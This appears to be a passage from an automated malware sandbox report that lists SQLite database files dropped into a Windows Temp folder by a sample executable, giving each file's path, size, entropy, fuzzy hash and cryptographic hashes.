                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\cPR0k1N9Ei

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.1358696453229276
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\cgbonUsdeA

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.1215420383712111
                                                                    Encrypted:false
                                                                    SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                    MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                    SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                                    SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                                    SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\csd1wAz2at

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.1215420383712111
                                                                    Encrypted:false
                                                                    SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                    MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                    SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                                    SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                                    SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\cxAXLWJs4K

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):51200
                                                                    Entropy (8bit):0.8746135976761988
                                                                    Encrypted:false
                                                                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\czYY6EOiow

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):51200
                                                                    Entropy (8bit):0.8746135976761988
                                                                    Encrypted:false
                                                                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\d7OCWZ6Hl2

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\dIe0pQGqLu

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.6732424250451717
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                    MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                    SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                    SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                    SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\dNm4VDGnYL

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.137181696973627
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
                                                                    MD5:2D903A087A0C793BDB82F6426B1E8EFB
                                                                    SHA1:E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
                                                                    SHA-256:AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
                                                                    SHA-512:90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\dQdDaLXkDm

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\df9ZeOsojt

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):51200
                                                                    Entropy (8bit):0.8746135976761988
                                                                    Encrypted:false
                                                                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\dh2cMa2pFQ

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.1215420383712111
                                                                    Encrypted:false
                                                                    SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                    MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                    SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                                    SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                                    SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\dkGUcjyq9S

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):49152
                                                                    Entropy (8bit):0.8180424350137764
                                                                    Encrypted:false
                                                                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                    MD5:349E6EB110E34A08924D92F6B334801D
                                                                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\dtfXlZDM4C

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.1358696453229276
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\e7sL11Pevu

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\eCMrX7aiM8

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):98304
                                                                    Entropy (8bit):0.08235737944063153
                                                                    Encrypted:false
                                                                    SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                    MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                    SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                    SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                    SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\ejVxVL7gHu

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.6732424250451717
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                    MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                    SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                    SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                    SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\fGGXlDFASc

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                    Category:dropped
                                                                    Size (bytes):114688
                                                                    Entropy (8bit):0.9746603542602881
                                                                    Encrypted:false
                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\fSHVRg42Bm

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):51200
                                                                    Entropy (8bit):0.8746135976761988
                                                                    Encrypted:false
                                                                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\fUibx77Ld1

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5712781801655107
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\fWTmjIKMHi

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.1215420383712111
                                                                    Encrypted:false
                                                                    SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                    MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                    SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                                    SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                                    SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\fXmoSl8m2F

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.6732424250451717
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                    MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                    SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                    SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                    SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\fcaE875HYs

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):49152
                                                                    Entropy (8bit):0.8180424350137764
                                                                    Encrypted:false
                                                                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                    MD5:349E6EB110E34A08924D92F6B334801D
                                                                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\ffL7Ys618Z

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.1358696453229276
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\fm1bAht2sV

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
